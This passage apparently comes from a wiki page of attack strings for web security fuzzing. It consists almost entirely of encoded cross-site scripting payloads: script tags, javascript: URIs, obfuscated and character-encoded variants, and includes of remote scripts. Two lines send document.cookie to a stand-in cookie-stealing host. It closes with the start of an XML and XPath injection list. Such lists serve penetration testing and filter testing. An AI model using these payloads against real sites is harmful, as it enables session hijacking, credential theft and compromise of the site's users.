&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
